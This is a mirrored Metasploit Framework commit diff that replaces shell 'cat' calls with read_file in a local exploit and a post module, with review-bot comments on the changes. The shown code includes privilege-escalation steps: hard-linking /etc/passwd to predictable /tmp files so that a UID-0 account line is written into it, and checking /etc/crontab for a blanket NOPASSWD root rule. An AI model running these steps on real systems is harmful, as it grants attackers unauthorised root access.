mirror of https://github.com/rapid7/metasploit-framework synced 2024-09-04 20:18:27 +02:00

Land #7377, read_file for some modules

William Vu 2016-09-28 18:00:23 -05:00
commit bcb040c1ac
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
3 changed files with 5 additions and 5 deletions


@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
def shemsham_installed?()
# we want this to be false.
vprint_status('Checking if shem or sham are installed')
shemsham = cmd_exec('cat /proc/cpuinfo')
shemsham = read_file('/proc/cpuinfo')
if shemsham.include?('shem')
print_error('shem installed, system not vulnerable.')
elsif shemsham.include?('sham')
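Review bot: `shemsham.include?('shem')` now runs directly on whatever `read_file('/proc/cpuinfo')` returns, and a failed or empty read is not distinguished from a clean one. If `read_file` can return nil for some session types (not visible in this hunk), the `include?` call raises; if it returns an empty string, the check presumably falls through as though neither shem nor sham were present. I would coerce and test explicitly, e.g. `shemsham = read_file('/proc/cpuinfo').to_s`, and report an error when the result is empty. The same applies to `read_file("/etc/crontab")` and the two `read_file("/etc/passwd").lines.count` calls in the later sections. The body of shemsham_installed? continues past the end of the hunk.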


@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Local
vprint_status("Now to check whether the script worked...")
# Check whether it worked
crontab = cmd_exec("cat /etc/crontab")
crontab = read_file("/etc/crontab")
vprint_status("Reading crontab yielded the following response: #{crontab}")
unless crontab.include? "ALL ALL=(ALL) NOPASSWD: ALL"
vprint_error("Bad news... it did not write to the file.")


@ -63,7 +63,7 @@ class MetasploitModule < Msf::Post
def run
print_status "Setting up the victim's /tmp dir"
initial_size = cmd_exec("cat /etc/passwd | wc -l")
initial_size = read_file("/etc/passwd").lines.count
print_status "/etc/passwd is currently #{initial_size} lines long"
i = 0
j = 0
@ -75,7 +75,7 @@ class MetasploitModule < Msf::Post
print_status "Linking /etc/passwd to predictable tmp files (Attempt #{j})"
cmd_exec("for i in `seq 0 120` ; do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
end
current_size = cmd_exec("cat /etc/passwd | wc -l")
current_size = read_file("/etc/passwd").lines.count
if current_size == initial_size
# PCAP is flowing
pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
@ -92,7 +92,7 @@ class MetasploitModule < Msf::Post
i = (i+1) % 60 # increment second counter
end
if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
if read_file("/etc/passwd").includes?("Metasploit")
print_good("Success. You should now be able to login or su to the '" + datastore['USERNAME'] + "' account")
# TODO: Consider recording our now-created username and password as a valid credential here.
else
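Review bot: `read_file("/etc/passwd").includes?("Metasploit")` calls a method that Ruby's String does not define; the predicate is `include?`, so this line raises NoMethodError when reached instead of reporting the outcome. It should read `if read_file("/etc/passwd").include?("Metasploit")`. The earlier hunks in this file switch to `.lines.count`, which yields an Integer where `cmd_exec` gave a String; the `current_size == initial_size` comparison stays like-for-like, but any other use of these values outside the hunks should be checked. The if/else continues past the end of the hunk.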